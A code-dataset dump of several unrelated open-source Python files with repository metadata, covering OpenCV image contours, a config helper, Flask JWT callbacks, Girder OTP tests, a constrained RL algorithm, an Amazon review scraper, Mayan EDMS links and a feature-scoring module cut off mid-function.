"MIT"
] | null | null | null | rummikub/predict.py | ronikobrosly/rummikub_AI | 4cce795d8cd6c54270d12ae14a7b2b6afa53ca2f | [
"MIT"
] | null | null | null |
from os.path import expanduser
import cv2
from keras.models import load_model
from matplotlib import pyplot as plt
import numpy as np
# Create kernel for cv2 dilation method
KERNEL = np.ones((5,5),np.uint8)
# Import the model
model = load_model('big_model')
# Read input image
img = cv2.imread(expanduser('~/Desktop/rummikub/images/prediction_test/pred_pic.png'))
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(imgray, (5, 5), 0)
edges = cv2.Canny(blurred, 100, 250)
edges = cv2.dilate(edges, KERNEL, iterations = 1)
contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
edges = cv2.cvtColor(edges,cv2.COLOR_GRAY2RGB)
for points in contours[0]:
coor_list = points[0].tolist()
edges = cv2.circle(edges, (coor_list[0],coor_list[1]), radius=5, color=(0, 250, 0), thickness=5)
cv2.imshow('edges', edges)
cv2.destroyAllWindows()
# Helpful links to continue this:
# https://www.pyimagesearch.com/2020/08/24/ocr-handwriting-recognition-with-opencv-keras-and-tensorflow/
# https://www.youtube.com/watch?v=6DjFscX4I_c
# https://stackoverflow.com/questions/60873721/python-contour-around-rectangle-based-on-specific-color-on-a-dark-image-opencv
# https://www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example/
# https://arnab.org/blog/so-i-suck-24-automating-card-games-using-opencv-and-python/
| 29.723404 | 125 | 0.759485 |
from os.path import expanduser
import cv2
from keras.models import load_model
from matplotlib import pyplot as plt
import numpy as np
# Create kernel for cv2 dilation method
KERNEL = np.ones((5,5),np.uint8)
# Import the model
model = load_model('big_model')
# Read input image
img = cv2.imread(expanduser('~/Desktop/rummikub/images/prediction_test/pred_pic.png'))
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(imgray, (5, 5), 0)
edges = cv2.Canny(blurred, 100, 250)
edges = cv2.dilate(edges, KERNEL, iterations = 1)
contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
edges = cv2.cvtColor(edges,cv2.COLOR_GRAY2RGB)
for points in contours[0]:
coor_list = points[0].tolist()
edges = cv2.circle(edges, (coor_list[0],coor_list[1]), radius=5, color=(0, 250, 0), thickness=5)
cv2.imshow('edges', edges)
cv2.destroyAllWindows()
# Helpful links to continue this:
# https://www.pyimagesearch.com/2020/08/24/ocr-handwriting-recognition-with-opencv-keras-and-tensorflow/
# https://www.youtube.com/watch?v=6DjFscX4I_c
# https://stackoverflow.com/questions/60873721/python-contour-around-rectangle-based-on-specific-color-on-a-dark-image-opencv
# https://www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example/
# https://arnab.org/blog/so-i-suck-24-automating-card-games-using-opencv-and-python/
| 0 | 0 | 0 |
a5c8abe1c65669f643bb9cbb0eb349888db744a9 | 1,311 | py | Python | src/lib/config.py | RonaldHiemstra/BronartsmeiH | 1ad3838b43abfe9a1f3416334439c8056aa50dde | [
"MIT"
] | null | null | null | src/lib/config.py | RonaldHiemstra/BronartsmeiH | 1ad3838b43abfe9a1f3416334439c8056aa50dde | [
"MIT"
] | 3 | 2021-03-17T16:05:01.000Z | 2021-05-01T18:47:43.000Z | src/lib/config.py | RonaldHiemstra/BronartsmeiH | 1ad3838b43abfe9a1f3416334439c8056aa50dde | [
"MIT"
] | null | null | null | """Support file to handle configuration files."""
import json
import os
class Config():
"""Class for serializing configuration items."""
def get(self, key=None, default=None):
"""Get a config item."""
if key is None:
# return all public config items (filter out the hidden items)
return {key: self.__config[key] for key in self.__config if not key.startswith('__')}
return self.__config.get(key, default)
def set(self, key, value):
"""Set a config item."""
self.__config[key] = value
with open(self.filename, 'w') as file:
file.write(json.dumps(self.__config))
def remove(self, key):
"""Set a config item."""
del self.__config[key]
with open(self.filename, 'w') as file:
file.write(json.dumps(self.__config))
| 31.214286 | 97 | 0.540809 | """Support file to handle configuration files."""
import json
import os
class Config():
"""Class for serializing configuration items."""
def __init__(self, filename):
self.filename = filename
try:
with open(self.filename) as file:
self.__config = json.load(file)
except OSError:
path = ''
for part in filename.split('/')[:-1]:
try:
os.mkdir(path + part)
except OSError:
pass
path += part + '/'
self.__config = dict()
def get(self, key=None, default=None):
"""Get a config item."""
if key is None:
# return all public config items (filter out the hidden items)
return {key: self.__config[key] for key in self.__config if not key.startswith('__')}
return self.__config.get(key, default)
def set(self, key, value):
"""Set a config item."""
self.__config[key] = value
with open(self.filename, 'w') as file:
file.write(json.dumps(self.__config))
def remove(self, key):
"""Set a config item."""
del self.__config[key]
with open(self.filename, 'w') as file:
file.write(json.dumps(self.__config))
| 434 | 0 | 27 |
f2992e31d0f58be982aab9d0bf92129cdc5b1c9e | 1,038 | py | Python | python-jwt.py | HTTP101/sturdy-octo-barnacle | 843df5bf3f65ab0617a2794b28ecaffef271d2ec | [
"MIT"
] | null | null | null | python-jwt.py | HTTP101/sturdy-octo-barnacle | 843df5bf3f65ab0617a2794b28ecaffef271d2ec | [
"MIT"
] | null | null | null | python-jwt.py | HTTP101/sturdy-octo-barnacle | 843df5bf3f65ab0617a2794b28ecaffef271d2ec | [
"MIT"
] | null | null | null | from flask_jwt_extended import create_access_token,JWTManager
from flask import jsonify
from application import app
from application.models.UserMaster import UserMaster
from application.config.config import Config
conf = Config()
app.config['JWT_SECRET_KEY'] = conf.JWT_SECRET_KEY
app.config['PROPAGATE_EXCEPTIONS'] = True
jwt = JWTManager(app=app)
@jwt.expired_token_loader
@jwt.invalid_token_loader
@jwt.unauthorized_loader
| 23.066667 | 68 | 0.701349 | from flask_jwt_extended import create_access_token,JWTManager
from flask import jsonify
from application import app
from application.models.UserMaster import UserMaster
from application.config.config import Config
conf = Config()
app.config['JWT_SECRET_KEY'] = conf.JWT_SECRET_KEY
app.config['PROPAGATE_EXCEPTIONS'] = True
jwt = JWTManager(app=app)
@jwt.expired_token_loader
def expired_token_callback(expired_token):
print("Ex")
token_type = expired_token['type']
return jsonify({
'success': 0,
'message': 'The {} token has expired'.format(token_type)
}), 401
@jwt.invalid_token_loader
def invalid_token_callback(reason):
print("Inv")
return jsonify({
'success':0,
'message':"The Given Token Is Invalid",
'info':reason
}),422
@jwt.unauthorized_loader
def unauthorized_loader_callback(reason):
print("Unauth")
return jsonify({
'success':0,
'message':"There is no Authorization Header in the request",
'info':reason
}),401
| 534 | 0 | 66 |
31a685b4046ff71a9304718c2fbced073961b530 | 6,496 | py | Python | test/test_user_otp.py | HailLab/girder | 974d869e6f53ec87a5e64730fee27eb6314fc006 | [
"Apache-2.0"
] | 395 | 2015-01-12T19:20:13.000Z | 2022-03-30T05:40:40.000Z | test/test_user_otp.py | HailLab/girder | 974d869e6f53ec87a5e64730fee27eb6314fc006 | [
"Apache-2.0"
] | 2,388 | 2015-01-01T20:09:19.000Z | 2022-03-29T16:49:14.000Z | test/test_user_otp.py | HailLab/girder | 974d869e6f53ec87a5e64730fee27eb6314fc006 | [
"Apache-2.0"
] | 177 | 2015-01-04T14:47:00.000Z | 2022-03-25T09:01:51.000Z | # -*- coding: utf-8 -*-
import pytest
from girder.exceptions import AccessException
from girder.models.setting import Setting
from girder.models.user import User
from girder.settings import SettingKey
from pytest_girder.assertions import assertStatus, assertStatusOk
| 33.484536 | 99 | 0.68319 | # -*- coding: utf-8 -*-
import pytest
from girder.exceptions import AccessException
from girder.models.setting import Setting
from girder.models.user import User
from girder.settings import SettingKey
from pytest_girder.assertions import assertStatus, assertStatusOk
def testInitializeOtp(user):
# The logic for the server hostname as the issuer cannot be tested here, since there is no
# current request, but that logic is explicitly tested in testOtpApiWorkflow
Setting().set(SettingKey.BRAND_NAME, 'Branded Girder')
otpUris = User().initializeOtp(user)
# A URI for TOTP should be returned
assert otpUris['totpUri'].startswith('otpauth://')
assert user['login'] in otpUris['totpUri']
assert 'issuer=Branded%20Girder' in otpUris['totpUri']
# OTP should not be enabled yet, since it's not finalized
assert user['otp']['enabled'] is False
# TOTP parameters should be generated
assert 'totp' in user['otp']
def testHasOtpEnabled(user):
assert User().hasOtpEnabled(user) is False
User().initializeOtp(user)
# OTP is not yet enabled
assert User().hasOtpEnabled(user) is False
user['otp']['enabled'] = True
assert User().hasOtpEnabled(user) is True
def _tokenFromTotpUri(totpUri, valid=True):
# Create an external TOTP instance
from passlib.totp import TOTP
totp = TOTP.from_uri(totpUri)
# Generate a valid token
otpToken = totp.generate().token
if not valid:
# Increment the token by 1 to invalidate it
otpToken = '%06d' % ((int(otpToken) + 1) % int(1e6))
return otpToken
def testVerifyOtp(server, user):
# Enable OTP
otpUris = User().initializeOtp(user)
user['otp']['enabled'] = True
# Generate an invalid token
otpToken = _tokenFromTotpUri(otpUris['totpUri'], False)
with pytest.raises(AccessException):
User().verifyOtp(user, otpToken)
# Generate a valid token
otpToken = _tokenFromTotpUri(otpUris['totpUri'])
# Verify the token, which should succeed without raising an exception
User().verifyOtp(user, otpToken)
# Re-verify the same token, which should fail
# The "server" fixture is necessary for this to work
with pytest.raises(AccessException):
User().verifyOtp(user, otpToken)
def testAuthenticateWithOtp(user):
# Providing an unnecessary token should fail
with pytest.raises(AccessException):
User().authenticate('user', 'password', '123456')
# Enable OTP and save user
otpUris = User().initializeOtp(user)
user['otp']['enabled'] = True
User().save(user)
# Providing no token should now fail
with pytest.raises(AccessException):
User().authenticate('user', 'password')
# Generate a valid token
otpToken = _tokenFromTotpUri(otpUris['totpUri'])
# Authenticate successfully with the valid token
User().authenticate('user', 'password', otpToken)
def testAuthenticateWithOtpConcatenated(user):
# Non-OTP-user authentication should still succeed with "otpToken=True"
User().authenticate('user', 'password', True)
# Enable OTP and save user
otpUris = User().initializeOtp(user)
user['otp']['enabled'] = True
User().save(user)
# Authentication should now fail
with pytest.raises(AccessException):
User().authenticate('user', 'password', True)
# Generate a valid token
otpToken = _tokenFromTotpUri(otpUris['totpUri'])
# Authenticate successfully with the valid token
User().authenticate('user', 'password' + otpToken, True)
def testOtpApiWorkflow(server, user):
# Try to finalize OTP before it's been initialized
resp = server.request(
path='/user/%s/otp' % user['_id'], method='PUT', user=user,
additionalHeaders=[('Girder-OTP', '123456')])
# This should fail cleanly
assertStatus(resp, 400)
assert 'not initialized' in resp.json['message']
# Try to disable OTP before it's been enabled
resp = server.request(path='/user/%s/otp' % user['_id'], method='DELETE', user=user)
# This should fail cleanly
assertStatus(resp, 400)
assert 'not enabled' in resp.json['message']
# Initialize OTP
resp = server.request(path='/user/%s/otp' % user['_id'], method='POST', user=user)
assertStatusOk(resp)
# Save the URI
totpUri = resp.json['totpUri']
# Test the logic for server hostname as OTP URI issuer
assert 'issuer=127.0.0.1' in totpUri
# Login without an OTP
resp = server.request(path='/user/authentication', method='GET', basicAuth='user:password')
# Since OTP has not been finalized, this should still succeed
assertStatusOk(resp)
# Finalize without an OTP
resp = server.request(
path='/user/%s/otp' % user['_id'], method='PUT', user=user)
assertStatus(resp, 400)
assert 'Girder-OTP' in resp.json['message']
# Finalize with an invalid OTP
resp = server.request(
path='/user/%s/otp' % user['_id'], method='PUT', user=user,
additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri, False))])
assertStatus(resp, 403)
assert 'validation failed' in resp.json['message']
# Finalize with a valid OTP
resp = server.request(
path='/user/%s/otp' % user['_id'], method='PUT', user=user,
additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri))])
assertStatusOk(resp)
# The valid token from this time period was used to finalize OTP; to prevent having to wait for
# the next time period, flush the rateLimitBuffer
from girder.utility._cache import rateLimitBuffer
rateLimitBuffer.invalidate()
# Login without an OTP
resp = server.request(path='/user/authentication', method='GET', basicAuth='user:password')
assertStatus(resp, 401)
assert 'Girder-OTP' in resp.json['message']
# Login with an invalid OTP
resp = server.request(
path='/user/authentication', method='GET', basicAuth='user:password',
additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri, False))])
assertStatus(resp, 401)
assert 'Token did not match' in resp.json['message']
# Login with a valid OTP
resp = server.request(
path='/user/authentication', method='GET', basicAuth='user:password',
additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri))])
assertStatusOk(resp)
# Disable OTP
resp = server.request(path='/user/%s/otp' % user['_id'], method='DELETE', user=user)
assertStatusOk(resp)
| 6,060 | 0 | 161 |
cf1fe7a14625d2db9b7aa3fc34ffda13a4a03d1f | 6,549 | py | Python | rl_safety_algorithms/algs/pdo/pdo.py | liuzuxin/RL-Safety-Algorithms | 2575225b1ea8ce12e1e13f7a81f8dda7b4189708 | [
"MIT"
] | 4 | 2021-09-05T17:49:02.000Z | 2021-12-22T03:13:39.000Z | rl_safety_algorithms/algs/pdo/pdo.py | liuzuxin/RL-Safety-Algorithms | 2575225b1ea8ce12e1e13f7a81f8dda7b4189708 | [
"MIT"
] | null | null | null | rl_safety_algorithms/algs/pdo/pdo.py | liuzuxin/RL-Safety-Algorithms | 2575225b1ea8ce12e1e13f7a81f8dda7b4189708 | [
"MIT"
] | 2 | 2021-09-05T17:49:07.000Z | 2021-11-30T17:36:30.000Z | """ PyTorch implementation of the Primal Dual Optimization (PDO) algorithm.
Author: Sven Gronauer (sven.gronauer@tum.de)
Created: 28.10.2020
Updated: --
inspired by:
Joshua Achiam, David Held, Aviv Tamar, Peter Abbeel
Constrained Policy Optimization
ICML 2017
also see:
Yinlam Chow, Mohammad Ghavamzadeh, Lucas Janson, and Marco Pavone
Risk-constrained reinforcement learning with percentile risk criteria
J. Mach. Learn. Res. 2017
"""
import numpy as np
from torch import optim
import torch
from rl_safety_algorithms.algs.cpo.cpo import CPOAlgorithm
from rl_safety_algorithms.algs.core import ConstrainedPolicyGradientAlgorithm
from rl_safety_algorithms.algs.npg.npg import NaturalPolicyGradientAlgorithm
from rl_safety_algorithms.algs.trpo.trpo import TRPOAlgorithm
import rl_safety_algorithms.algs.utils as U
from rl_safety_algorithms.common import utils
import rl_safety_algorithms.common.mpi_tools as mpi_tools
| 38.523529 | 85 | 0.626661 | """ PyTorch implementation of the Primal Dual Optimization (PDO) algorithm.
Author: Sven Gronauer (sven.gronauer@tum.de)
Created: 28.10.2020
Updated: --
inspired by:
Joshua Achiam, David Held, Aviv Tamar, Peter Abbeel
Constrained Policy Optimization
ICML 2017
also see:
Yinlam Chow, Mohammad Ghavamzadeh, Lucas Janson, and Marco Pavone
Risk-constrained reinforcement learning with percentile risk criteria
J. Mach. Learn. Res. 2017
"""
import numpy as np
from torch import optim
import torch
from rl_safety_algorithms.algs.cpo.cpo import CPOAlgorithm
from rl_safety_algorithms.algs.core import ConstrainedPolicyGradientAlgorithm
from rl_safety_algorithms.algs.npg.npg import NaturalPolicyGradientAlgorithm
from rl_safety_algorithms.algs.trpo.trpo import TRPOAlgorithm
import rl_safety_algorithms.algs.utils as U
from rl_safety_algorithms.common import utils
import rl_safety_algorithms.common.mpi_tools as mpi_tools
class PrimalDualOptimizationAlgorithm(CPOAlgorithm,
ConstrainedPolicyGradientAlgorithm):
def __init__(
self,
alg: str = 'pdo',
cost_limit: float = 25.,
lagrangian_multiplier_init: float = 0.001,
lambda_optimizer: str = 'Adam',
lambda_lr: float = 0.001,
**kwargs
):
CPOAlgorithm.__init__(
self,
alg=alg,
cost_limit=cost_limit,
lagrangian_multiplier_init=lagrangian_multiplier_init,
lambda_lr=lambda_lr,
lambda_optimizer=lambda_optimizer,
**kwargs
)
assert self.alg == 'pdo' # sanity check of argument passing
ConstrainedPolicyGradientAlgorithm.__init__(
self,
cost_limit=cost_limit,
use_lagrangian_penalty=True, # todo: this param might be of no relevance
lagrangian_multiplier_init=lagrangian_multiplier_init,
lambda_lr=lambda_lr,
lambda_optimizer=lambda_optimizer
)
def algorithm_specific_logs(self):
NaturalPolicyGradientAlgorithm.algorithm_specific_logs(self)
self.logger.log_tabular('Misc/cost_gradient_norm')
self.logger.log_tabular('LagrangeMultiplier',
self.lagrangian_multiplier.item())
def update(self):
# First update Lagrange multiplier parameter
# Note that logger already uses MPI statistics across all processes..
ep_costs = self.logger.get_stats('EpCosts')[0]
# First update Lagrange multiplier parameter
self.update_lagrange_multiplier(ep_costs)
super().update()
def update_policy_net(self, data):
# Get loss and info values before update
theta_old = U.get_flat_params_from(self.ac.pi.net)
self.pi_optimizer.zero_grad()
loss_pi, pi_info = self.compute_loss_pi(data=data)
self.loss_pi_before = loss_pi.item()
self.loss_v_before = self.compute_loss_v(data['obs'],
data['target_v']).item()
self.loss_c_before = self.compute_loss_c(data['obs'],
data['target_c']).item()
# get prob. distribution before updates
p_dist = self.ac.pi.dist(data['obs'])
# Train policy with multiple steps of gradient descent
loss_pi.backward()
# average grads across MPI processes
mpi_tools.mpi_avg_grads(self.ac.pi.net)
g_flat = U.get_flat_gradients_from(self.ac.pi.net)
g_flat *= -1 # flip sign since policy_loss = -(ration * adv)
# get the policy cost performance gradient b (flat as vector)
self.pi_optimizer.zero_grad()
loss_cost, _ = self.compute_loss_cost_performance(data=data)
loss_cost.backward()
# average grads across MPI processes
mpi_tools.mpi_avg_grads(self.ac.pi.net)
self.loss_pi_cost_before = loss_cost.item()
b_flat = U.get_flat_gradients_from(self.ac.pi.net)
p = g_flat - self.lagrangian_multiplier * b_flat
x = U.conjugate_gradients(self.Fvp, p, self.cg_iters)
assert torch.isfinite(x).all()
pHp = torch.dot(x, self.Fvp(x)) # equivalent to : p^T x
assert pHp.item() >= 0, 'No negative values.'
# perform descent direction
eps = 1.0e-8
alpha = torch.sqrt(2 * self.target_kl / (pHp + eps))
step_direction = alpha * x
assert torch.isfinite(step_direction).all()
ep_costs = self.logger.get_stats('EpCosts')[0]
c = ep_costs - self.cost_limit
c /= (self.logger.get_stats('EpLen')[0] + eps) # rescale
# determine step direction and apply SGD step after grads where set
final_step_dir, accept_step = self.adjust_step_direction(
step_dir=step_direction,
g_flat=g_flat,
p_dist=p_dist,
data=data
)
# update actor network parameters
new_theta = theta_old + final_step_dir
U.set_param_values_to_model(self.ac.pi.net, new_theta)
with torch.no_grad():
q_dist = self.ac.pi.dist(data['obs'])
kl = torch.distributions.kl.kl_divergence(p_dist,
q_dist).mean().item()
loss_pi, pi_info = self.compute_loss_pi(data=data)
self.logger.store(**{
'Values/Adv': data['act'].numpy(),
'Entropy': pi_info['ent'],
'KL': kl,
'PolicyRatio': pi_info['ratio'],
'Loss/Pi': self.loss_pi_before,
'Loss/DeltaPi': loss_pi.item() - self.loss_pi_before,
'Misc/AcceptanceStep': accept_step,
'Misc/Alpha': alpha.item(),
'Misc/StopIter': 1,
'Misc/FinalStepNorm': final_step_dir.norm().item(),
'Misc/xHx': pHp.item(),
'Misc/gradient_norm': torch.norm(g_flat).item(),
'Misc/cost_gradient_norm': torch.norm(b_flat).item(),
'Misc/H_inv_g': x.norm().item(),
})
def get_alg(env_id, **kwargs) -> PrimalDualOptimizationAlgorithm:
return PrimalDualOptimizationAlgorithm(
env_id=env_id,
**kwargs
)
def learn(env_id,
**kwargs
) -> tuple:
defaults = utils.get_defaults_kwargs(alg='pdo', env_id=env_id)
defaults.update(**kwargs)
alg = PrimalDualOptimizationAlgorithm(
env_id=env_id,
**defaults
)
ac, env = alg.learn()
return ac, env
| 5,312 | 105 | 176 |
00a9e5f58342a9bccd8e67ac41aec89b1b16e559 | 1,048 | py | Python | AmazonProductReviewScraping/reviews/spiders/productReviews.py | pranav0904/Amazon-Product-Review | 76a39c667642c98f2c4f240fda5fcf92a7fa5cf8 | [
"MIT"
] | 1 | 2021-12-14T08:39:16.000Z | 2021-12-14T08:39:16.000Z | AmazonProductReviewScraping/reviews/spiders/productReviews.py | pranav0904/Amazon-Product-Review | 76a39c667642c98f2c4f240fda5fcf92a7fa5cf8 | [
"MIT"
] | null | null | null | AmazonProductReviewScraping/reviews/spiders/productReviews.py | pranav0904/Amazon-Product-Review | 76a39c667642c98f2c4f240fda5fcf92a7fa5cf8 | [
"MIT"
] | 1 | 2021-12-02T16:51:34.000Z | 2021-12-02T16:51:34.000Z | import scrapy
from scrapy import Request
import scraper_helper as sh
from scrapy.selector import Selector
review_url = 'https://www.amazon.com/product-reviews/{}'
asin_list = ['B08CVSL4K5'] #Roborock
| 33.806452 | 116 | 0.59542 | import scrapy
from scrapy import Request
import scraper_helper as sh
from scrapy.selector import Selector
review_url = 'https://www.amazon.com/product-reviews/{}'
asin_list = ['B08CVSL4K5'] #Roborock
class ProductreviewsSpider(scrapy.Spider):
name = 'productReviews'
def start_requests(self):
for asin in asin_list:
url = review_url.format(asin)
yield scrapy.Request(url)
def parse(self, response):
for review in response.css('[data-hook = "review"]'):
item = {
'Rating': review.css('[data-hook = "review-star-rating"] ::text').get(),
'Review_title': review.css('[data-hook = "review-title"] span ::text').get(),
'Product_review': review.xpath('normalize-space(.//*[@data-hook="review-body"]/span/text())').get(),
}
yield item
next_page = review.xpath('//a[text() = "Next page"]/@href').get()
if next_page:
yield scrapy.Request(response.urljoin(next_page))
| 715 | 107 | 23 |
a193ad0ca2236f916cfc3ad918e5d50bc9873323 | 3,485 | py | Python | mayan/apps/metadata/links.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 2 | 2021-09-12T19:41:19.000Z | 2021-09-12T19:41:20.000Z | mayan/apps/metadata/links.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 37 | 2021-09-13T01:00:12.000Z | 2021-10-02T03:54:30.000Z | mayan/apps/metadata/links.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 1 | 2021-09-22T13:17:30.000Z | 2021-09-22T13:17:30.000Z | from django.utils.translation import ugettext_lazy as _
from mayan.apps.documents.permissions import permission_document_type_edit
from mayan.apps.navigation.classes import Link
from .icons import (
icon_document_metadata_add, icon_document_metadata_edit,
icon_document_metadata_remove, icon_document_metadata_view,
icon_metadata_type_create, icon_metadata_type_delete,
icon_metadata_type_document_type_list, icon_metadata_type_edit,
icon_metadata_type_list, icon_document_type_metadata_type_list
)
from .permissions import (
permission_document_metadata_add, permission_document_metadata_edit,
permission_document_metadata_remove, permission_document_metadata_view,
permission_metadata_type_create, permission_metadata_type_delete,
permission_metadata_type_edit, permission_metadata_type_view
)
link_metadata_add = Link(
args='object.pk', icon=icon_document_metadata_add,
permissions=(permission_document_metadata_add,), text=_('Add metadata'),
view='metadata:metadata_add',
)
link_metadata_edit = Link(
args='object.pk', icon=icon_document_metadata_edit,
permissions=(permission_document_metadata_edit,),
text=_('Edit metadata'), view='metadata:metadata_edit'
)
link_metadata_multiple_add = Link(
icon=icon_document_metadata_add, text=_('Add metadata'),
view='metadata:metadata_multiple_add'
)
link_metadata_multiple_edit = Link(
icon=icon_document_metadata_edit, text=_('Edit metadata'),
view='metadata:metadata_multiple_edit'
)
link_metadata_multiple_remove = Link(
icon=icon_document_metadata_remove, text=_('Remove metadata'),
view='metadata:metadata_multiple_remove'
)
link_metadata_remove = Link(
args='object.pk', icon=icon_document_metadata_remove,
permissions=(permission_document_metadata_remove,),
text=_('Remove metadata'), view='metadata:metadata_remove',
)
link_metadata_view = Link(
args='resolved_object.pk', icon=icon_document_metadata_view,
permissions=(permission_document_metadata_view,), text=_('Metadata'),
view='metadata:metadata_view',
)
link_document_type_metadata_type_relationship = Link(
args='resolved_object.pk',
icon=icon_document_type_metadata_type_list,
permissions=(permission_document_type_edit,),
text=_('Metadata types'), view='metadata:document_type_metadata_type_relationship',
)
link_metadata_type_document_type_relationship = Link(
args='resolved_object.pk',
icon=icon_metadata_type_document_type_list,
permissions=(permission_document_type_edit,),
text=_('Document types'), view='metadata:metadata_type_document_type_relationship',
)
link_metadata_type_create = Link(
icon=icon_metadata_type_create,
permissions=(permission_metadata_type_create,), text=_('Create new'),
view='metadata:metadata_type_create'
)
link_metadata_type_delete = Link(
args='object.pk', icon=icon_metadata_type_delete,
permissions=(permission_metadata_type_delete,),
tags='dangerous', text=_('Delete'), view='metadata:metadata_type_delete',
)
link_metadata_type_edit = Link(
args='object.pk', icon=icon_metadata_type_edit,
permissions=(permission_metadata_type_edit,),
text=_('Edit'), view='metadata:metadata_type_edit'
)
link_metadata_type_list = Link(
icon=icon_metadata_type_list,
permissions=(permission_metadata_type_view,),
text=_('Metadata types'), view='metadata:metadata_type_list'
)
| 41.488095 | 88 | 0.781636 | from django.utils.translation import ugettext_lazy as _
from mayan.apps.documents.permissions import permission_document_type_edit
from mayan.apps.navigation.classes import Link
from .icons import (
icon_document_metadata_add, icon_document_metadata_edit,
icon_document_metadata_remove, icon_document_metadata_view,
icon_metadata_type_create, icon_metadata_type_delete,
icon_metadata_type_document_type_list, icon_metadata_type_edit,
icon_metadata_type_list, icon_document_type_metadata_type_list
)
from .permissions import (
permission_document_metadata_add, permission_document_metadata_edit,
permission_document_metadata_remove, permission_document_metadata_view,
permission_metadata_type_create, permission_metadata_type_delete,
permission_metadata_type_edit, permission_metadata_type_view
)
link_metadata_add = Link(
args='object.pk', icon=icon_document_metadata_add,
permissions=(permission_document_metadata_add,), text=_('Add metadata'),
view='metadata:metadata_add',
)
link_metadata_edit = Link(
args='object.pk', icon=icon_document_metadata_edit,
permissions=(permission_document_metadata_edit,),
text=_('Edit metadata'), view='metadata:metadata_edit'
)
link_metadata_multiple_add = Link(
icon=icon_document_metadata_add, text=_('Add metadata'),
view='metadata:metadata_multiple_add'
)
link_metadata_multiple_edit = Link(
icon=icon_document_metadata_edit, text=_('Edit metadata'),
view='metadata:metadata_multiple_edit'
)
link_metadata_multiple_remove = Link(
icon=icon_document_metadata_remove, text=_('Remove metadata'),
view='metadata:metadata_multiple_remove'
)
link_metadata_remove = Link(
args='object.pk', icon=icon_document_metadata_remove,
permissions=(permission_document_metadata_remove,),
text=_('Remove metadata'), view='metadata:metadata_remove',
)
link_metadata_view = Link(
args='resolved_object.pk', icon=icon_document_metadata_view,
permissions=(permission_document_metadata_view,), text=_('Metadata'),
view='metadata:metadata_view',
)
link_document_type_metadata_type_relationship = Link(
args='resolved_object.pk',
icon=icon_document_type_metadata_type_list,
permissions=(permission_document_type_edit,),
text=_('Metadata types'), view='metadata:document_type_metadata_type_relationship',
)
link_metadata_type_document_type_relationship = Link(
args='resolved_object.pk',
icon=icon_metadata_type_document_type_list,
permissions=(permission_document_type_edit,),
text=_('Document types'), view='metadata:metadata_type_document_type_relationship',
)
link_metadata_type_create = Link(
icon=icon_metadata_type_create,
permissions=(permission_metadata_type_create,), text=_('Create new'),
view='metadata:metadata_type_create'
)
link_metadata_type_delete = Link(
args='object.pk', icon=icon_metadata_type_delete,
permissions=(permission_metadata_type_delete,),
tags='dangerous', text=_('Delete'), view='metadata:metadata_type_delete',
)
link_metadata_type_edit = Link(
args='object.pk', icon=icon_metadata_type_edit,
permissions=(permission_metadata_type_edit,),
text=_('Edit'), view='metadata:metadata_type_edit'
)
link_metadata_type_list = Link(
icon=icon_metadata_type_list,
permissions=(permission_metadata_type_view,),
text=_('Metadata types'), view='metadata:metadata_type_list'
)
| 0 | 0 | 0 |
4e5a5ed27eea5e994d2324b6c0408176e8371053 | 15,744 | py | Python | citrees/scorers.py | m0hashi/citrees | e7d4866109ce357d5d67cffa450604567f7b469e | [
"MIT"
] | null | null | null | citrees/scorers.py | m0hashi/citrees | e7d4866109ce357d5d67cffa450604567f7b469e | [
"MIT"
] | null | null | null | citrees/scorers.py | m0hashi/citrees | e7d4866109ce357d5d67cffa450604567f7b469e | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function
import ctypes
from numba import njit
import numpy as np
from os.path import dirname, join
import pandas as pd
from scipy.stats import rankdata as rank
from sklearn.feature_selection import mutual_info_classif
# from externals.six.moves import range
#######################
"""CREATE C WRAPPERS"""
#######################
# Define constants for wrapping C functions
# SHARED_OBJECT_DIR = join(dirname(__file__), 'bin')
# Weighted distance correlation
# CFUNC_DCORS_PATH = join(SHARED_OBJECT_DIR, 'dcor.so')
# CFUNC_DCORS_DLL = ctypes.CDLL(CFUNC_DCORS_PATH)
# CFUNC_DCORS_DLL.wdcor.argtypes = (
# ctypes.POINTER(ctypes.c_double), # x
# ctypes.POINTER(ctypes.c_double), # y
# ctypes.c_int, # n
# ctypes.POINTER(ctypes.c_double) # w
# )
# CFUNC_DCORS_DLL.wdcor.restype = ctypes.c_double
# Unweighted distance correlation
# CFUNC_DCORS_DLL.dcor.argtypes = (
# ctypes.POINTER(ctypes.c_double), # x
# ctypes.POINTER(ctypes.c_double), # y
# ctypes.c_int, # n
# )
# CFUNC_DCORS_DLL.dcor.restype = ctypes.c_double
###################################
"""FEATURE SELECTORS: CONTINUOUS"""
###################################
@njit(cache=True, nogil=True, fastmath=True)
def pcor(x, y):
"""Pearson correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
cor : float
Pearson correlation
"""
if x.ndim > 1: x = x.ravel()
if y.ndim > 1: y = y.ravel()
# Define variables for looping
n, sx, sy, sx2, sy2, sxy = len(x), 0.0, 0.0, 0.0, 0.0, 0.0
# Loop to calculate statistics
for i in range(n):
xi = x[i]
yi = y[i]
sx += xi
sx2 += xi*xi
sy += yi
sy2 += yi*yi
sxy += xi*yi
# Covariance terms
cov = n*sxy - sx*sy
ssx = n*sx2 - sx*sx
ssy = n*sy2 - sy*sy
# Catch division by zero errors
if ssx == 0.0 or ssy == 0.0:
return 0.0
else:
return cov/np.sqrt(ssx*ssy)
def cca(X, Y):
